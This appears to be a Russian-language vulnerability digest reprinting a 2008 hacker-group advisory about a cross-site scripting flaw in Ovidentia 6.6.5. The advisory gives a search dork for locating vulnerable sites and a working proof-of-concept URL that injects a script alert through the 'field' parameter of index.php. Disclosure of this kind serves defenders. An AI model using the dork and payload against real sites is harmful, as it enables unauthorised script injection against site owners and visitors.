Дополнительная информация

Ежедневная сводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

SunShop <= 4.1.4 SQL Injection

Vanilla <= 1.1.4 Script Injection/ XSS

Multiple vulnerabilities in Envolution

From:	ThE dE@Th <mostafa_ragab_(at)_msn.com>
Date:	19 августа 2008 г.
Subject:	Ovidentia 6.6.5 XSS (index.php)‏

#################################################################################
####> #### Ovidentia
6.6.5 XSS ####> #################################################################################
####>
# #> #Discovered by : ThE dE@Th <mailto:dE@Th> #> # #> #Fr!ends : Bright D@rk <mailto:D@rk> -
The-Gh0st - all 3asfh.net Members #>
#################################################################################
####> # #> #Script
Download : www.ovidentia.org #> # #> #DORK : "Powered by Ovidentia" #> # #>
#################################################################################
####> # [Bug] #> # #>
#http://Site/{path}/index.
php?tg=search&pat=abcdefgh&idx=find&navpos=0&navitem=&field=<
script>alert(333.45)</script>#
#> # [Note] #> # #> # #> # I'm Not a hacker #>
#################################################################################
####> # #>
###################################### TNX GOD ######################################